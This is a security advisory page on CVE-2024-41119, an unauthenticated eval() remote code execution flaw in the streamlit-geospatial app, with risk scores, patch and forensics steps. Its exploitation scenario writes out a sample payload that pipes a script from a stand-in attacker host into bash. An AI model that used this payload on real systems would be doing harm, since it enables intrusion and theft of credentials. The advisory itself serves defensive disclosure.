AI Threat Alert AI Threat Alert

CVE-2024-41119: streamlit-geospatial: RCE via eval() on vis_params input

CRITICAL PoC AVAILABLE CISA: ATTEND
Published July 26, 2024
CISO Take

This is a trivially exploitable remote code execution vulnerability requiring zero authentication — any internet-exposed instance is fully compromised by design. Patch immediately to commit c4f81d96 or take the application offline; assume breach if the service was publicly accessible. Audit all Streamlit-based ML dashboards in your environment for similar eval() patterns on user-controlled inputs.

Risk Assessment

Maximum risk for any internet-exposed deployment. CVSS 9.8 with AV:N/AC:L/PR:N/UI:N means no barriers to exploitation — a single HTTP request is sufficient. The eval() antipattern is well-understood and exploits are trivial to craft, placing this within script-kiddie reach. AI/ML dashboards are frequently deployed on internal or cloud infrastructure with broad permissions (model access, cloud credentials, data pipelines), dramatically amplifying blast radius beyond the application itself.

Affected Systems

Package Ecosystem Vulnerable Range Patched
streamlit-geospatial pip No patch
44.4K OpenSSF 7.2 2.8K dependents Pushed 7d ago 8% patched ~0d to patch Full package profile →

Do you use streamlit-geospatial? You're affected.

Severity & Risk

CVSS 3.1
9.8 / 10
EPSS
1.6%
chance of exploitation in 30 days
Higher than 82% of all CVEs
Source: EPSS v3 — FIRST.org
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI None
S Unchanged
C High
I High
A High

Recommended Action

5 steps

  1. PATCH

    Update to commit c4f81d9616d40c60584e36abb15300853a66e489 immediately; verify the eval() call on line 86 of 8_Raster_Data_Visualization.py has been replaced with safe input handling.

  2. ISOLATE

    If patching is not immediately possible, take the application offline or restrict access to trusted IP ranges via network controls (VPN, firewall allowlist).

  3. AUDIT

    Review all other pages in the application and any other Streamlit apps in your environment for eval(), exec(), or subprocess calls on user-controlled inputs.

  4. FORENSICS

    If the application was internet-accessible, conduct incident response — check for new user accounts, cron jobs, unusual outbound connections, and unauthorized file modifications on the host.

  5. HARDEN

    Enforce a policy that Streamlit ML apps must never expose eval/exec on user inputs; add SAST rules (Bandit, Semgrep) to CI/CD pipelines to catch CWE-20 patterns in Python ML codebases.

CISA SSVC Assessment

Decision Attend
Exploitation poc
Automatable Yes
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Framework Inference AML.T0025 AML.T0037 AML.T0049 AML.T0050

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.9.1 - Information security in AI system development
NIST AI RMF
MANAGE 2.2 - Mechanisms are in place to minimize AI risk impacts
OWASP LLM Top 10
LLM05:2025 - Improper Output Handling / Insecure Code Execution

Frequently Asked Questions

What is CVE-2024-41119?

This is a trivially exploitable remote code execution vulnerability requiring zero authentication — any internet-exposed instance is fully compromised by design. Patch immediately to commit c4f81d96 or take the application offline; assume breach if the service was publicly accessible. Audit all Streamlit-based ML dashboards in your environment for similar eval() patterns on user-controlled inputs.

Is CVE-2024-41119 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-41119, increasing the risk of exploitation.

How to fix CVE-2024-41119?

1. PATCH: Update to commit c4f81d9616d40c60584e36abb15300853a66e489 immediately; verify the eval() call on line 86 of 8_Raster_Data_Visualization.py has been replaced with safe input handling. 2. ISOLATE: If patching is not immediately possible, take the application offline or restrict access to trusted IP ranges via network controls (VPN, firewall allowlist). 3. AUDIT: Review all other pages in the application and any other Streamlit apps in your environment for eval(), exec(), or subprocess calls on user-controlled inputs. 4. FORENSICS: If the application was internet-accessible, conduct incident response — check for new user accounts, cron jobs, unusual outbound connections, and unauthorized file modifications on the host. 5. HARDEN: Enforce a policy that Streamlit ML apps must never expose eval/exec on user inputs; add SAST rules (Bandit, Semgrep) to CI/CD pipelines to catch CWE-20 patterns in Python ML codebases.

What systems are affected by CVE-2024-41119?

This vulnerability affects the following AI/ML architecture patterns: ML data visualization dashboards, geospatial AI/ML platforms, research compute environments, model serving.

What is the CVSS score for CVE-2024-41119?

CVE-2024-41119 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 1.56%.

Technical Details

NVD Description

streamlit-geospatial is a streamlit multipage app for geospatial applications. Prior to commit c4f81d9616d40c60584e36abb15300853a66e489, the `vis_params` variable on line 80 in `8_🏜️_Raster_Data_Visualization.py` takes user input, which is later used in the `eval()` function on line 86, leading to remote code execution. Commit c4f81d9616d40c60584e36abb15300853a66e489 fixes this issue.

Exploitation Scenario

An attacker discovers an internet-exposed streamlit-geospatial instance via Shodan or Censys (Streamlit default port 8501). They navigate to the Raster Data Visualization page (/8_Raster_Data_Visualization) and submit a crafted vis_params value such as: `__import__('os').popen('curl https://attacker.com/implant.sh | bash').read()`. The application passes this directly to eval() at line 86 with no sanitization, executing the attacker's payload server-side. Within seconds, the attacker has a reverse shell on the ML host, from which they pivot to exfiltrate model weights, cloud credentials (AWS IAM keys, GCP service accounts), and any connected databases or data pipelines — all without needing a username or password.

Weaknesses (CWE)

CWE-20

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

Timeline

Published
July 26, 2024
Last Modified
November 21, 2024
First Seen
July 26, 2024

Related Vulnerabilities

CRITICAL CVE-2024-41115 9.8

streamlit-geospatial: eval() injection enables RCE

Same package: streamlit
CRITICAL CVE-2024-41112 9.8

streamlit-geospatial: RCE via eval() on palette input

Same package: streamlit
CRITICAL CVE-2024-41113 9.8

streamlit-geospatial: RCE via eval() in Timelapse page

Same package: streamlit
CRITICAL CVE-2024-41114 9.8

streamlit-geospatial: RCE via eval() on palette input

Same package: streamlit
CRITICAL CVE-2024-41116 9.8

streamlit-geospatial: RCE via eval() injection

Same package: streamlit
Back to Threat Feed